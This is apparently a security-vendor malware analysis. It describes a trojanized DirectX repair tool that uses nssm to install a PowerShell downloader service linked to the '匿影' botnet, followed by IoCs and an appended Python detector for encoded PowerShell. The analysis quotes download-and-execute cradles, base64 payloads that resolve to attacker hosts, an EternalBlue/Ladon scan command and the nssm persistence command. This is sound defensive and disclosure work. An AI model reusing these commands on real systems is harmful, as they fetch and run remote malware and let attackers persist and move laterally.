1. Background

Recently, while helping a user deal with a malware infection, we found that the machine had been hit by a downloader trojan. One of the log entries read:

    防护项目:利用PowerShell执行可疑脚本
    执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    执行命令行:"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
    操作结果:已允许
    进程ID:6504
    操作进程:C:\Windows\nssm.exe
    操作进程命令行:C:\Windows\nssm.exe
    操作进程校验和:32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1
    父进程ID:1080
    父进程:C:\Windows\System32\services.exe
    父进程命令行:C:\Windows\system32\services.exe

The nssm tool had, unexpectedly, turned up in the operating system directory. Base64-decoding the encoded PowerShell command line gives:

    IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))

A threat-intelligence lookup turned up a similar sample: hxxp://win.yearidper.com/per.txt

Continuing through the security logs, we found another entry:

    防护项目:利用PowerShell执行可疑脚本
    执行文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    执行命令行:powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
    操作结果:已阻止
    进程ID:18248
    操作进程:C:\Windows\SysWOW64\cmd.exe
    操作进程命令行:cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
    操作进程校验和:4048488DE6BA4BFEF9EDF103755519F1F762668F
    父进程ID:13520
    父进程:C:\Windows\SysWOW64\mmc.exe
    父进程命令行:mmc.exe

After downloading that URL, we found it to be a PowerShell downloader trojan. Checking the security logs again:

    病毒名称:Trojan/Agent
    病毒ID:A68B6378A5A9FBBE
    病毒路径:C:\Users\Public\sharpwmi.exe
    操作类型:修改
    操作结果:已处理
    进程ID:13520
    操作进程:C:\Windows\SysWOW64\mmc.exe
    操作进程命令行:mmc.exe
    父进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

The malware had saved some of its files under C:\Users\Public. Opening C:\Users\Public revealed several EternalBlue exploit programs and brute-force tools (pass.txt is a password dictionary, user.txt a username dictionary):
Further into the security logs:

    风险路径:C:\Windows\system32\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件
    风险路径:C:\Windows\SysWOW64\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件

So the malware had also planted two suspicious .vbs files, both named WMIHACKER_0.6.vbs, in the system directories. A lookup shows that WMIHACKER is an intranet lateral-movement tool.

When asked, the user said the symptoms appeared after downloading and running a "DX repair tool" (DirectXRepair_4.1.0.30770_Online.rar).

2. Tracing

(1) Searching for hxxp://ye.yearidper.com shows that many people had previously reported this infection on several forums, as shown in the figure below:
(2) 1) A threat-intelligence query on hxxp://cdn.comenbove.com turned up a sample that communicates with it (SHA-256 9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97):
The sample masquerades as a Steam-related file. PE file information:

    File description: Steam
    File version: 2.10.91.91
    Product name: Steam
    Language: 0x0816 0x04e4
    Copyright: © Valve Corporation

When run, the sample directly fetches hxxp://cdn.comenbove.com/shell.txt, which is a PowerShell downloader trojan:

    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
    Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

The sample also executes the command line:

    powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=

which base64-decodes to:

    IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))

Fetching hxxp://5d.bbacpummd.cloud returns exactly the same five-line script as shell.txt above (the four DownloadFile calls to hxxp://cdn.comenbove.com/smbdown/ followed by Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt).

We also found that the sample tries to fetch files from http://5d.strongapt.ml, but that site is already down. Research shows this domain was previously used by the "匿影" (HideShadow) botnet to distribute the earlier "WannaRen" ransomware (discovered by 360; the earlier address was hxxps://api.strongapt.ml/vmp2.jpg), and Qi An Xin had long since tagged several of its communication domains as the "HideShadowMiner" family.
That effectively confirms this as a malware sample suspected of being tied to the "匿影" botnet.

2) The threat-intelligence query on hxxp://cdn.comenbove.com also revealed another file on the same server, hxxp://cdn.comenbove.com/smb.jpg, as shown below:

Its content:

    $fileNames = Test-Path C:\ProgramData\smbx22.txt
    $nic='True'
    if($fileNames -ne $nic){
    (new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:\ProgramData\smbx22.txt') }
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
    (new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
    Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

(https://www.upload.ee/files/14046702/1.txt.html is an empty 0 KB file.)

3. Examining the trojanized DirectXRepair

File name: DirectX Repair.exe
PE file information:
    File Version Information:
    Original Name: 加入任务计划.exe
    Internal Name: 加入任务计划
    File Version: 1.0

When run, the file drops the files the "DX repair tool" needs while at the same time dropping nssm.exe into the system directory:

    Files Dropped:
    %ProgramData%\DirectX Repair.exe
    %windir%\nssm.exe

It then runs the command line:

    %windir%\nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA

(This is the same PowerShell command as in section 1, and it base64-decodes to the same result.) Note that nssm install registers the given program as a Windows service, so the downloader is restarted by the service control manager at every boot; that is why the section 1 log shows nssm.exe with services.exe as its parent.

Analysis shows that the sample drops into %ProgramData% the components needed for the "DX repair" function to work normally, while behind the scenes it quietly drops and runs %windir%\nssm.exe together with the cmd/PowerShell downloader command line. The related mind map is shown below:
4. Significance

The "匿影" botnet has previously distributed ransomware such as "WannaRen", and some users hit by this malware were infected with ransomware at the same time (whether the two are linked cannot yet be determined). Although no other behaviour has been observed so far, the harm to users is considerable and should not be underestimated; users who see these alerts should act promptly.

5. IoCs

    hxxp://ye.yearidper.com
    hxxp://cdn.comenbove.com/Ladon66.jpg
    hxxp://cdn.comenbove.com/shell.txt
    hxxp://cdn.comenbove.com/smbdown/cp.txt
    hxxp://cdn.comenbove.com/smbdown/abc.jpg
    hxxp://cdn.comenbove.com/Asy.jpg
    hxxp://cdn.comenbove.com/smb.jpg
    hxxp://5d.bbacpummd.cloud/

* All malicious links in this article have been defanged (hxxp). The base64 code may be flagged by antivirus software; that is normal, as the web page cannot be executed directly. To keep the article as complete as possible it has been left as-is for now.
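The triage the analyst did by hand in sections 1 and 3 (pull the -e argument out of the command line, base64-decode it as UTF-16LE, then look for IEX / DownloadString / -ep bypass / nssm install), as an added Python example that is not part of the original article. The command lines and domains in it are constructed placeholders in the shape of the log entries above, not the real indicators.

```python
import base64
import re
from typing import Optional

# Indicator patterns drawn from the command lines in this write-up (constructed list).
INDICATORS = [
    (r"\bIEX\b|Invoke-Expression", "inline script execution"),
    (r"\.Download(String|File)\(", "web download"),
    (r"-(ep|ExecutionPolicy)\s+bypass", "execution policy bypass"),
    (r"-NoP\b|-NonI\b|-w(indowstyle)?\s+hidden", "stealth switches"),
    (r"\bnssm\.exe\s+install\b", "NSSM service persistence"),
    (r"\bLadon\b|MS17010|WMIHACKER", "lateral-movement tooling"),
]

def encode_command(script: str) -> str:
    """Produce what PowerShell expects after -e/-EncodedCommand: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -e/-enc/-EncodedCommand payload, or None if absent or invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # the dropper's nssm line arrives with its '==' padding cut off
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> dict:
    """Decode any encoded payload, then report every indicator matching the effective script."""
    decoded = decode_encoded_command(cmdline)
    effective = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for pat, name in INDICATORS if re.search(pat, effective, re.I)]
    return {"decoded": decoded, "hits": hits}

# Constructed sample command lines with placeholder domains (hypothetical, not the real IoCs).
SAMPLE_SCRIPT = "IEX ((new-object net.webclient).downloadstring('http://c2.example.invalid/p'))"
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -NonI -ep bypass -e " + encode_command(SAMPLE_SCRIPT),
    "cmd.exe /c powershell \"IEX (New-Object Net.WebClient).DownloadString("
    "'http://cdn.example.invalid/L.jpg'); Ladon 10.0.0.1/16 MS17010\"",
    r"C:\Windows\System32\svchost.exe -k netsvcs",  # benign control line
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze(line)
        print(f"{line[:60]!r}: {result['hits'] or 'clean'}")
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```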